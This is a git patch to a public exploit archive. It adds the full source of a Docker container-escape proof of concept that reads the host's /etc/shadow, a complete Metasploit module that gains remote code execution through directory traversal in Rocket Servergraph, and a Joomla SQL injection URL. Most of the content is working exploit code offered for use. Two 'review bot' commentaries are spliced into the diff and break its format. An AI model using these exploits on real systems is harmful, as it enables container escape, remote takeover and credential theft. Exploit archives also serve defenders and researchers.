From c6e45583e6ef6470f6a87861a8648e983aa2b675 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 20 Jun 2014 04:38:01 +0000
Subject: [PATCH] Updated 06_20_2014

---
 files.csv | 8 +-
 platforms/linux/local/33808.c | 188 +++++++++++
 platforms/multiple/remote/33807.rb | 348 +++++++++++++++++++++
 platforms/osx/remote/33810.html | 9 +
 platforms/osx/remote/33811.html | 9 +
 platforms/php/webapps/33812.txt | 7 +
 platforms/php/webapps/33813.html | 9 +
 platforms/windows/{remote => dos}/33804.pl | 0
 8 files changed, 577 insertions(+), 1 deletion(-)
 create mode 100755 platforms/linux/local/33808.c
 create mode 100755 platforms/multiple/remote/33807.rb
 create mode 100755 platforms/osx/remote/33810.html
 create mode 100755 platforms/osx/remote/33811.html
 create mode 100755 platforms/php/webapps/33812.txt
 create mode 100755 platforms/php/webapps/33813.html
 rename platforms/windows/{remote => dos}/33804.pl (100%)

diff --git a/files.csv b/files.csv
index 0f22be64f..4416f5e7a 100755
--- a/files.csv
+++ b/files.csv
@@ -30453,4 +30453,10 @@ id,file,description,date,author,platform,type,port
 33801,platforms/linux/dos/33801.txt,"Mozilla Firefox/Thunderbird/Seamonkey CVE-2010-0167 Multiple Memory Corruption Vulnerabilities",2010-03-24,"Bob Clary",linux,dos,0
 33802,platforms/multiple/remote/33802.txt,"Jenkins Software RakNet 3.72 - Remote Integer Underflow Vulnerability",2010-03-25,"Luigi Auriemma",multiple,remote,0
 33803,platforms/hardware/webapps/33803.txt,"ZTE WXV10 W300 - Multiple Vulnerabilities",2014-06-18,"Osanda Malith",hardware,webapps,0
-33804,platforms/windows/remote/33804.pl,"Ubisoft Rayman Legends 1.2.103716 - Remote Stack Buffer Overflow Vulnerability",2014-06-18,LiquidWorm,windows,remote,0
+33804,platforms/windows/dos/33804.pl,"Ubisoft Rayman Legends 1.2.103716 - Remote Stack Buffer Overflow Vulnerability",2014-06-18,LiquidWorm,windows,dos,0
+33807,platforms/multiple/remote/33807.rb,"Rocket Servergraph Admin Center fileRequestor Remote Code Execution",2014-06-18,metasploit,multiple,remote,8888
+33808,platforms/linux/local/33808.c,"docker 0.11 VMM-container Breakout",2014-06-18,"Sebastian Krahmer",linux,local,0
+33810,platforms/osx/remote/33810.html,"Apple Safari for iPhone/iPod touch Malformed 'Throw' Exception Remote Code Execution Vulnerability",2010-03-26,"Nishant Das Patnaik",osx,remote,0
+33811,platforms/osx/remote/33811.html,"Apple Safari iPhone/iPod touch Malformed Webpage Remote Code Execution Vulnerability",2010-03-26,"Nishant Das Patnaik",osx,remote,0
+33812,platforms/php/webapps/33812.txt,"Joomla! 'com_weblinks' Component 'id' Parameter SQL Injection Vulnerability",2010-03-29,"Pouya Daneshmand",php,webapps,0
+33813,platforms/php/webapps/33813.html,"Fuctweb CapCC Plugin 1.0 for WordPress 'plugins.php' SQL Injection Vulnerability",2008-12-13,MustLive,php,webapps,0
diff --git a/platforms/linux/local/33808.c b/platforms/linux/local/33808.c
new file mode 100755
index 000000000..59c57da8f
--- /dev/null
+++ b/platforms/linux/local/33808.c
@@ -0,0 +1,188 @@
+/* shocker: docker PoC VMM-container breakout (C) 2014 Sebastian Krahmer
+ *
+ * Demonstrates that any given docker image someone is asking
+ * you to run in your docker setup can access ANY file on your host,
+ * e.g. dumping hosts /etc/shadow or other sensitive info, compromising
+ * security of the host and any other docker VM's on it.
+ *
+ * docker using container based VMM: Sebarate pid and net namespace,
+ * stripped caps and RO bind mounts into container's /. However
+ * as its only a bind-mount the fs struct from the task is shared
+ * with the host which allows to open files by file handles
+ * (open_by_handle_at()). As we thankfully have dac_override and
+ * dac_read_search we can do this. The handle is usually a 64bit
+ * string with 32bit inodenumber inside (tested with ext4).
+ * Inode of / is always 2, so we have a starting point to walk
+ * the FS path and brute force the remaining 32bit until we find the
+ * desired file (It's probably easier, depending on the fhandle export
+ * function used for the FS in question: it could be a parent inode# or
+ * the inode generation which can be obtained via an ioctl).
+ * [In practise the remaining 32bit are all 0 :]
+ *
+ * tested with docker 0.11 busybox demo image on a 3.11 kernel:
+ *
+ * docker run -i busybox sh
+ *
+ * seems to run any program inside VMM with UID 0 (some caps stripped); if
+ * user argument is given, the provided docker image still
+ * could contain +s binaries, just as demo busybox image does.
+ *
+ * PS: You should also seccomp kexec() syscall :)
+ * PPS: Might affect other container based compartments too
+ *
+ * $ cc -Wall -std=c99 -O2 shocker.c -static
+ */
+
+#define _GNU_SOURCE
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+
+struct my_file_handle {
+ unsigned int handle_bytes;
+ int handle_type;
+ unsigned char f_handle[8];
+};
+
+
+
+void die(const char *msg)
+{
+ perror(msg);
+ exit(errno);
+}
+
+
+void dump_handle(const struct my_file_handle *h)
+{
+ fprintf(stderr,"[*] #=%d, %d, char nh[] = {", h->handle_bytes,
+ h->handle_type);
+ for (int i = 0; i < h->handle_bytes; ++i) {
+ fprintf(stderr,"0x%02x", h->f_handle[i]);
+ if ((i + 1) % 20 == 0)
+ fprintf(stderr,"\n");
+ if (i < h->handle_bytes - 1)
+ fprintf(stderr,", ");
+ }
+ fprintf(stderr,"};\n");
+}
+
+
+int find_handle(int bfd, const char *path, const struct my_file_handle *ih, struct my_file_handle *oh)
+{
+ int fd;
+ uint32_t ino = 0;
+ struct my_file_handle outh = {
+ .handle_bytes = 8,
+ .handle_type = 1
+ };
+ DIR *dir = NULL;
+ struct dirent *de = NULL;
+
+ path = strchr(path, '/');
+
+ // recursion stops if path has been resolved
+ if (!path) {
+ memcpy(oh->f_handle, ih->f_handle, sizeof(oh->f_handle));
+ oh->handle_type = 1;
+ oh->handle_bytes = 8;
+ return 1;
+ }
+ ++path;
+ fprintf(stderr, "[*] Resolving '%s'\n", path);
+
+ if ((fd = open_by_handle_at(bfd, (struct file_handle *)ih, O_RDONLY)) < 0)
+ die("[-] open_by_handle_at");
+
+ if ((dir = fdopendir(fd)) == NULL)
+ die("[-] fdopendir");
+
+ for (;;) {
+ de = readdir(dir);
+ if (!de)
+ break;
+ fprintf(stderr, "[*] Found %s\n", de->d_name);
+ if (strncmp(de->d_name, path, strlen(de->d_name)) == 0) {
+ fprintf(stderr, "[+] Match: %s ino=%d\n", de->d_name, (int)de->d_ino);
+ ino = de->d_ino;
+ break;
+ }
+ }
+
+ fprintf(stderr, "[*] Brute forcing remaining 32bit. 
This can take a while...\n");
+
+
+ if (de) {
+ for (uint32_t i = 0; i < 0xffffffff; ++i) {
+ outh.handle_bytes = 8;
+ outh.handle_type = 1;
+ memcpy(outh.f_handle, &ino, sizeof(ino));
+ memcpy(outh.f_handle + 4, &i, sizeof(i));
+
+ if ((i % (1<<20)) == 0)
+ fprintf(stderr, "[*] (%s) Trying: 0x%08x\n", de->d_name, i);
+ if (open_by_handle_at(bfd, (struct file_handle *)&outh, 0) > 0) {
+ closedir(dir);
+ close(fd);
+ dump_handle(&outh);
+ return find_handle(bfd, path, &outh, oh);
+ }
+ }
+ }
+
+ closedir(dir);
+ close(fd);
+ return 0;
+}
+
+
+int main()
+{
+ char buf[0x1000];
+ int fd1, fd2;
+ struct my_file_handle h;
+ struct my_file_handle root_h = {
+ .handle_bytes = 8,
+ .handle_type = 1,
+ .f_handle = {0x02, 0, 0, 0, 0, 0, 0, 0}
+ };
+
+ fprintf(stderr, "[***] docker VMM-container breakout Po(C) 2014 [***]\n"
+ "[***] The tea from the 90's kicks your sekurity again. [***]\n"
+ "[***] If you have pending sec consulting, I'll happily [***]\n"
+ "[***] forward to my friends who drink secury-tea too! [***]\n\n\n");
+
+ read(0, buf, 1);
+
+ // get a FS reference from something mounted in from outside
+ if ((fd1 = open("/.dockerinit", O_RDONLY)) < 0)
+ die("[-] open");
+
+ if (find_handle(fd1, "/etc/shadow", &root_h, &h) <= 0)
+ die("[-] Cannot find valid handle!");
+
+ fprintf(stderr, "[!] Got a final handle!\n");
+ dump_handle(&h);
+
+ if ((fd2 = open_by_handle_at(fd1, (struct file_handle *)&h, O_RDONLY)) < 0)
+ die("[-] open_by_handle");
+
+ memset(buf, 0, sizeof(buf));
+ if (read(fd2, buf, sizeof(buf) - 1) < 0)
+ die("[-] read");
+
+ fprintf(stderr, "[!] Win! /etc/shadow output follows:\n%s\n", buf);
+
+ close(fd2); close(fd1);
+
+ return 0;
+}
+
diff --git a/platforms/multiple/remote/33807.rb b/platforms/multiple/remote/33807.rb
new file mode 100755
index 000000000..9f21b600b
--- /dev/null
+++ b/platforms/multiple/remote/33807.rb
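Review bot: `die()` reports via `perror()` and exits with `errno`, but at the `die("[-] Cannot find valid handle!")` call in `main` no system call has just failed, so the message carries whatever errno was left over and the process can exit with status 0 on a failed run; a fixed non-zero status, `exit(errno ? errno : 1);`, keeps the exit code meaningful. The return of `read(0, buf, 1)` is unchecked, and `ino = de->d_ino` narrows `ino_t` into a `uint32_t`, which the header's `cc -Wall` build line does not warn about without `-Wconversion`. The file comment states the precondition only in passing: the technique needs CAP_DAC_READ_SEARCH retained in the container and an unfiltered open_by_handle_at(2), so a one-line note such as `/* mitigation: drop CAP_DAC_READ_SEARCH and filter open_by_handle_at with seccomp */` would give a reader the check to run against their own runtime. For detection, an open_by_handle_at call issued from a containerized process is a high-signal audit event that the PoC cannot avoid, which is worth stating alongside the seccomp remark already in the header.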
@@ -0,0 +1,348 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = GreatRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + include Msf::Exploit::EXE + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Rocket Servergraph Admin Center fileRequestor Remote Code Execution', + 'Description' => %q{ + This module abuses several directory traversal flaws in Rocket Servergraph Admin + Center for Tivoli Storage Manager. The issues exist in the fileRequestor servlet, + allowing a remote attacker to write arbitrary files and execute commands with + administrative privileges. This module has been tested successfully on Rocket + ServerGraph 1.2 over Windows 2008 R2 64 bits, Windows 7 SP1 32 bits and Ubuntu + 12.04 64 bits. + }, + 'Author' => + [ + 'rgod ', # Vulnerability discovery + 'juan vazquez' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2014-3914'], + ['ZDI', '14-161'], + ['ZDI', '14-162'], + ['BID', '67779'] + ], + 'Privileged' => true, + 'Platform' => %w{ linux unix win }, + 'Arch' => [ARCH_X86, ARCH_X86_64, ARCH_CMD], + 'Payload' => + { + 'Space' => 8192, # it's writing a file, so just a long enough value + 'DisableNops' => true + #'BadChars' => (0x80..0xff).to_a.pack("C*") # Doesn't apply + }, + 'Targets' => + [ + [ 'Linux (Native Payload)', + { + 'Platform' => 'linux', + 'Arch' => ARCH_X86 + } + ], + [ 'Linux (CMD Payload)', + { + 'Platform' => 'unix', + 'Arch' => ARCH_CMD + } + ], + [ 'Windows / VB Script', + { + 'Platform' => 'win', + 'Arch' => ARCH_X86 + } + ], + [ 'Windows CMD', + { + 'Platform' => 'win', + 'Arch' => ARCH_CMD + } + ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Oct 30 2013')) + + register_options( + [ + Opt::RPORT(8888) + ], self.class) + + register_advanced_options( + [ + 
OptInt.new('TRAVERSAL_DEPTH', [ true, 'Traversal depth to hit the root folder', 20]), + OptString.new("WINDIR", [ true, 'The Windows Directory name', 'WINDOWS' ]), + OptString.new("TEMP_DIR", [ false, 'A directory where we can write files' ]) + ], self.class) + + end + + def check + os = get_os + + if os.nil? + return Exploit::CheckCode::Safe + end + + Exploit::CheckCode::Appears + end + + def exploit + os = get_os + + if os == 'win' && target.name =~ /Linux/ + fail_with(Failure::BadConfig, "#{peer} - Windows system detected, but Linux target selected") + elsif os == 'linux' && target.name =~ /Windows/ + fail_with(Failure::BadConfig, "#{peer} - Linux system detected, but Windows target selected") + elsif os.nil? + print_warning("#{peer} - Failed to detect remote operating system, trying anyway...") + end + + if target.name =~ /Windows.*VB/ + exploit_windows_vbs + elsif target.name =~ /Windows.*CMD/ + exploit_windows_cmd + elsif target.name =~ /Linux.*CMD/ + exploit_linux_cmd + elsif target.name =~ /Linux.*Native/ + exploit_linux_native + end + end + + def exploit_windows_vbs + traversal = "\\.." 
* traversal_depth + payload_base64 = Rex::Text.encode_base64(generate_payload_exe) + temp = temp_dir('win') + decoder_file_name = "#{rand_text_alpha(4 + rand(3))}.vbs" + encoded_file_name = "#{rand_text_alpha(4 + rand(3))}.b64" + exe_file_name = "#{rand_text_alpha(4 + rand(3))}.exe" + + print_status("#{peer} - Dropping the encoded payload to filesystem...") + write_file("#{traversal}#{temp}#{encoded_file_name}", payload_base64) + + vbs = generate_decoder_vbs({ + :temp_dir => "C:#{temp}", + :encoded_file_name => encoded_file_name, + :exe_file_name => exe_file_name + }) + print_status("#{peer} - Dropping the VBS decoder to filesystem...") + write_file("#{traversal}#{temp}#{decoder_file_name}", vbs) + + register_files_for_cleanup("C:#{temp}#{decoder_file_name}") + register_files_for_cleanup("C:#{temp}#{encoded_file_name}") + register_files_for_cleanup("C:#{temp}#{exe_file_name}") + print_status("#{peer} - Executing payload...") + execute("#{traversal}\\#{win_dir}\\System32\\cscript //nologo C:#{temp}#{decoder_file_name}") + end + + + def exploit_windows_cmd + traversal = "\\.." * traversal_depth + execute("#{traversal}\\#{win_dir}\\System32\\cmd.exe /B /C #{payload.encoded}") + end + + def exploit_linux_native + traversal = "/.." 
* traversal_depth + payload_base64 = Rex::Text.encode_base64(generate_payload_exe) + temp = temp_dir('linux') + encoded_file_name = "#{rand_text_alpha(4 + rand(3))}.b64" + decoder_file_name = "#{rand_text_alpha(4 + rand(3))}.sh" + elf_file_name = "#{rand_text_alpha(4 + rand(3))}.elf" + + print_status("#{peer} - Dropping the encoded payload to filesystem...") + write_file("#{traversal}#{temp}#{encoded_file_name}", payload_base64) + + decoder = <<-SH +#!/bin/sh + +base64 --decode #{temp}#{encoded_file_name} > #{temp}#{elf_file_name} +chmod 777 #{temp}#{elf_file_name} +#{temp}#{elf_file_name} +SH + + print_status("#{peer} - Dropping the decoder to filesystem...") + write_file("#{traversal}#{temp}#{decoder_file_name}", decoder) + + register_files_for_cleanup("#{temp}#{decoder_file_name}") + register_files_for_cleanup("#{temp}#{encoded_file_name}") + register_files_for_cleanup("#{temp}#{elf_file_name}") + + print_status("#{peer} - Giving execution permissions to the decoder...") + execute("#{traversal}/bin/chmod 777 #{temp}#{decoder_file_name}") + + print_status("#{peer} - Executing decoder and payload...") + execute("#{traversal}/bin/sh #{temp}#{decoder_file_name}") + end + + def exploit_linux_cmd + temp = temp_dir('linux') + elf = rand_text_alpha(4 + rand(4)) + + traversal = "/.." 
* traversal_depth + print_status("#{peer} - Dropping payload...") + write_file("#{traversal}#{temp}#{elf}", payload.encoded) + register_files_for_cleanup("#{temp}#{elf}") + print_status("#{peer} - Providing execution permissions...") + execute("#{traversal}/bin/chmod 777 #{temp}#{elf}") + print_status("#{peer} - Executing payload...") + execute("#{traversal}#{temp}#{elf}") + end + + def generate_decoder_vbs(opts = {}) + decoder_path = File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64") + + f = File.new(decoder_path, "rb") + decoder = f.read(f.stat.size) + f.close + + decoder.gsub!(/>>decode_stub/, "") + decoder.gsub!(/^echo /, "") + decoder.gsub!(/ENCODED/, "#{opts[:temp_dir]}#{opts[:encoded_file_name]}") + decoder.gsub!(/DECODED/, "#{opts[:temp_dir]}#{opts[:exe_file_name]}") + + decoder + end + + def get_os + os = nil + path = "" + hint = rand_text_alpha(3 + rand(4)) + + res = send_request(20, "writeDataFile", rand_text_alpha(4 + rand(10)), "/#{hint}/#{hint}") + + if res && res.code == 200 && res.body =~ /java.io.FileNotFoundException: (.*)\/#{hint}\/#{hint} \(No such file or directory\)/ + path = $1 + elsif res && res.code == 200 && res.body =~ /java.io.FileNotFoundException: (.*)\\#{hint}\\#{hint} \(The system cannot find the path specified\)/ + path = $1 + end + + if path =~ /^\// + os = 'linux' + elsif path =~ /^[a-zA-Z]:\\/ + os = 'win' + end + + os + end + + def temp_dir(os) + temp = "" + case os + when 'linux' + temp = linux_temp_dir + when 'win' + temp = win_temp_dir + end + + temp + end + + def linux_temp_dir + dir = "/tmp/" + + if datastore['TEMP_DIR'] && !datastore['TEMP_DIR'].empty? + dir = datastore['TEMP_DIR'] + end + + unless dir.start_with?("/") + dir = "/#{dir}" + end + + unless dir.end_with?("/") + dir = "#{dir}/" + end + + dir + end + + def win_temp_dir + dir = "\\#{win_dir}\\Temp\\" + + if datastore['TEMP_DIR'] && !datastore['TEMP_DIR'].empty? 
+ dir = datastore['TEMP_DIR'] + end + + dir.gsub!(/\//, "\\") + dir.gsub!(/^([A-Za-z]:)?/, "") + + unless dir.start_with?("\\") + dir = "\\#{dir}" + end + + unless dir.end_with?("\\") + dir = "#{dir}\\" + end + + dir + end + + def win_dir + dir = "WINDOWS" + if datastore['WINDIR'] + dir = datastore['WINDIR'] + dir.gsub!(/\//, "\\") + dir.gsub!(/[\\]*$/, "") + dir.gsub!(/^([A-Za-z]:)?[\\]*/, "") + end + + dir + end + + def traversal_depth + depth = 20 + + if datastore['TRAVERSAL_DEPTH'] && datastore['TRAVERSAL_DEPTH'] > 1 + depth = datastore['TRAVERSAL_DEPTH'] + end + + depth + end + + def write_file(file_name, contents) + res = send_request(20, "writeDataFile", Rex::Text.uri_encode(contents), file_name) + + unless res && res.code == 200 && res.body.to_s =~ /Data successfully writen to file: / + fail_with(Failure::Unknown, "#{peer} - Failed to write file... aborting") + end + + res + end + + def execute(command) + res = send_request(1, "run", command) + + res + end + + def send_request(timeout, command, query, source = rand_text_alpha(rand(4) + 4)) + data = "&invoker=#{rand_text_alpha(rand(4) + 4)}" + data << "&title=#{rand_text_alpha(rand(4) + 4)}" + data << "¶ms=#{rand_text_alpha(rand(4) + 4)}" + data << "&id=#{rand_text_alpha(rand(4) + 4)}" + data << "&cmd=#{command}" + data << "&source=#{source}" + data << "&query=#{query}" + + res = send_request_cgi( + { + 'uri' => normalize_uri('/', 'SGPAdmin', 'fileRequest'), + 'method' => 'POST', + 'data' => data + }, timeout) + + res + end + +end \ No newline at end of file diff --git a/platforms/osx/remote/33810.html b/platforms/osx/remote/33810.html new file mode 100755 index 000000000..578ab7146 --- /dev/null +++ b/platforms/osx/remote/33810.html 
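Review bot: `win_temp_dir` and `win_dir` assign the datastore string to `dir` and then call `gsub!` on it, which rewrites the user's `TEMP_DIR` and `WINDIR` option values in place, so a second run sees already-normalised values and `win_dir` permanently strips any drive letter the operator set; copy before mutating, `dir = datastore['TEMP_DIR'].dup` and `dir = datastore['WINDIR'].dup`. `generate_decoder_vbs` opens the template with `File.new` and only closes it on the success path; `decoder = File.binread(decoder_path)` does the same read without the leaked handle. `get_os`, which `check` also calls, depends on the servlet echoing a `java.io.FileNotFoundException` for a random path, so even the check alone presumably leaves a distinctive error entry in the application log that defenders can alert on, and that behaviour deserves a comment above `get_os` since the module otherwise documents nothing about its footprint.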
@@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/38992/info + +Apple Safari on iPhone and iPod touch is prone to a remote code-execution vulnerability. + +Successful exploits can allow an attacker to run arbitrary code in the context of the user running the application. Failed attacks may cause denial-of-service conditions. + +Safari on Apple iPhone and iPod touch 3.1.3 is vulnerable; other versions may also be affected. + + Bad "throw" exception Remote DoS on Safari for iPhone & iPod Touch

Bad "throw" exception Remote DoS on Safari for iPhone & iPod Touch

(C) Nishant Das Patnaik

\ No newline at end of file diff --git a/platforms/osx/remote/33811.html b/platforms/osx/remote/33811.html new file mode 100755 index 000000000..cff9b1f40 --- /dev/null +++ b/platforms/osx/remote/33811.html @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/38994/info + +Apple Safari running on iPhone and iPod touch is prone to a remote code-execution vulnerability. + +Successful exploits will allow an attacker to run arbitrary code in the context of the user running the application. Failed attacks may cause denial-of-service conditions. + +Safari on Apple iPhone and iPod touch 3.1.3 and prior are vulnerable. + +

Remote DoS on Safari for iPhone & iPod Touch

(C) Nishant Das Patnaik

\ No newline at end of file diff --git a/platforms/php/webapps/33812.txt b/platforms/php/webapps/33812.txt new file mode 100755 index 000000000..bf81df328 --- /dev/null +++ b/platforms/php/webapps/33812.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/39032/info + +The 'com_weblinks' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/index.php?option=com_weblinks&task=view&catid=8&id=-1 UNION SELECT 1,2,3,4,5 \ No newline at end of file diff --git a/platforms/php/webapps/33813.html b/platforms/php/webapps/33813.html new file mode 100755 index 000000000..3a14e8aca --- /dev/null +++ b/platforms/php/webapps/33813.html @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/39038/info + +Fuctweb CapCC Plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +CapCC 1.0 is affected; other versions may also be vulnerable. + + CapCC SQL Injection exploit (C) 2008 MustLive. http://websecurity.com.ua
\ No newline at end of file diff --git a/platforms/windows/remote/33804.pl b/platforms/windows/dos/33804.pl similarity index 100% rename from platforms/windows/remote/33804.pl rename to platforms/windows/dos/33804.pl